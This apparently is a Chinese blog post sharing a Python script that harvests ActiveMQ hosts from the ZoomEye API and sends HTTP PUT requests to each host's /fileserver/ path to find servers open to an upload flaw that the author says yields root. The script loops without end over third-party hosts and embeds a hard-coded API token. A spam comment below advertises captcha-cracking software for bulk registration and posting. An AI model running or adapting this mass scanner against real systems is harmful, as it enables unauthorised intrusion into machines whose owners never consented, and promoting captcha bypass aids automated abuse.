ActiveMQ漏洞批量扫描(zoomeye api 调取实例)

最近上班做app的渗透测试,突然发现ActiveMQ的漏洞非常简单即可拿到root权限

正好想学学开发GUI程序,想写一个调取zoomeye api 的GUI版小程序,不过等以后有时间再写GUI吧 :sweat_smile:

python3环境,调用zoomeye api测试有漏洞的ip并保存下来

#! /usr/bin/env python
# -*- coding:utf-8 -*-

import requests
import json
import re


def api_get(page): # zoomeye api get搜索ActiveMQ关键词的地址(每天10000条搜索上限)
    ip_list = []
    headers = {'Authorization': 'JWT eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6Inh1bmJsb2dAcXEuY29tIiwiaWF0IjoxNTIyODIzNTk4LCJuYmYiOjE1MjI4MjM1OTgsImV4cCI6MTUyMjg2Njc5OH0.lTcwPw_8j-cATJsWkWkg1K-ti2n6HCDm8loEsbl3hLQ'}
    geturl = 'https://api.zoomeye.org/host/search?query=ActiveMQ&facets=app,os&page=%d'% page
    try:
        req = requests.get(url=geturl,headers=headers)
        decoded = json.loads(req.text)
        for info in decoded['matches']:
            ip = (info['ip'])
            portinfo = info['portinfo']
            port = portinfo['port']
            mch = re.search('Manage ActiveMQ broker',portinfo['banner']) # 筛选确定为 ActiveMQ的管理页面
            if mch is not None:
                result = (str(ip) + ':' + str(port))
                ip_list.append(result)
    except Exception:
        print('zoomeye api 出错')
    return ip_list

def saveListToFile(file,list):  # 将列表逐行写如文件中
    s = '\n'.join(list)
    try:
        with open(file,'a') as output:
            output.write(s)
    except Exception:
        print('txt文件没有写入权限')

def check_getshell(ip_list): # 检查是否有漏洞
    good_url_list = []
    for ip in ip_list:
        puturl = 'http://%s/fileserver/test.txt' % ip
        try:
            req = requests.put(url=puturl, data='ok',timeout=0.5)
            if req.status_code == 204:
                print (puturl + ' is ok')
                good_url_list.append(puturl)
        except Exception:
            print ('网站访问太慢跳过')
    return good_url_list

def main():
    page = 1
    print('开始抓漏洞url')
    while (1):
        print('正在抓取第' + str(page) + '页')
        good_url_list = check_getshell(api_get(page))
        saveListToFile('good.txt',good_url_list)
        page = page + 1


if __name__=='__main__':
    main()

效果还是不错的

《ActiveMQ漏洞批量扫描(zoomeye api 调取实例)》

随便一台就是root权限

《ActiveMQ漏洞批量扫描(zoomeye api 调取实例)》

具体反弹shell的过程就不细谈了

《ActiveMQ漏洞批量扫描(zoomeye api 调取实例)》

程序仅供测试研究,请勿使用本程序进行非法活动

《ActiveMQ漏洞批量扫描(zoomeye api 调取实例)》

点赞
  1. Tittyspag说道:

    XRumer19.0+XEvil4.0:创新的软件解决方案,用于破解任何验证码

    1. 强大的Neuronets:XEvil OCR可以解决超过12000种不同类型的验证码,
    包括这样的流行,像谷歌验证码的ReCaptcha v2,v3(在XEvil4.0超只!),Captcha.Com,SolveMedia,必应验证码,
    Facebook的-验证码和Ucoz-验证码,Yandex的验证码,DLE-验证码,VBulletin-验证码,还有很多其他类型的!

    2. 极高的速度和精度:识别速度0.01。. 每张图片0.02秒(但在演示版本中只有1秒!),
    XEvil可以绕过并解决高精度captcha的广泛类型,
    不取决于难度,失真,噪音,字体,颜色。

    3. 非常简单的用户界面:只需3个主按钮即可开始识别,
    因此,它很容易与搜索引擎优化,SMM,分析一个广泛的幽灵程序使用,
    批量自动注册/发布/发送/发布/加密货币挖掘计划。

    有兴趣吗? ;)
    只要做搜索在谷歌"XEvil免费"。
    免费试用版可用!

    感谢您的关注! ;)

发表评论

电子邮件地址不会被公开。 必填项已用*标注